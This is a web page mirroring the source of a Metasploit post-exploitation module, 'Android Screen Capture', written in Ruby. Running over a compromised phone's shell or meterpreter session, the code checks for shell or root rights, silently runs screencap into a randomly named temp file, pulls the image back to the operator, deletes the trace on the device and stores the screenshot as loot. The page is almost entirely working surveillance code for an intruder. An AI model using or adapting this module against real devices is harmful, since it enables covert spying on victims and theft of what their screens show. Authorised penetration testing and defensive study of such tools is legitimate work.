CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/capture/screen.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Common

8
  include Msf::Post::File

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Android Screen Capture',

15
        'Description' => %q{

16
          This module takes a screenshot of the target phone.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'timwr' ],

20
        'Platform' => [ 'android' ],

21
        'SessionTypes' => [ 'shell', 'meterpreter' ]

22
      )

23
    )

24


25
    register_options(

26
      [

27
        OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),

28
        OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])

29
      ]

30
    )

31
  end

32


33
  def run

34
    id = cmd_exec('id')

35
    unless id =~ (/root/) || id =~ (/shell/)

36
      print_error('This module requires shell or root permissions')

37
      return

38
    end

39


40
    exe_path = datastore['EXE_PATH']

41
    tmp_path = datastore['TMP_PATH']

42
    if !file?(exe_path)

43
      print_error('Aborting, screencap binary not found.')

44
      return

45
    end

46


47
    begin

48
      file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"

49
      cmd_exec("#{exe_path} -p #{file}")

50
      print_good('Downloading screenshot...')

51
      data = read_file(file)

52
      file_rm(file)

53
    rescue ::Rex::Post::Meterpreter::RequestError => e

54
      print_error('Error taking the screenshot')

55
      vprint_error("#{e.class} #{e} #{e.backtrace}")

56
      return

57
    end

58


59
    unless data

60
      print_error('No data for screenshot')

61
      return

62
    end

63


64
    begin

65
      fn = 'screenshot.png'

66
      location = store_loot('screen_capture.screenshot', 'image/png', session, data, fn, 'Screenshot')

67
      print_good("Screenshot saved at #{location}")

68
    rescue ::IOError, ::Errno::ENOENT => e

69
      print_error('Error storing screenshot')

70
      vprint_error("#{e.class} #{e} #{e.backtrace}")

71
      return

72
    end

73
  end

74
end

75


76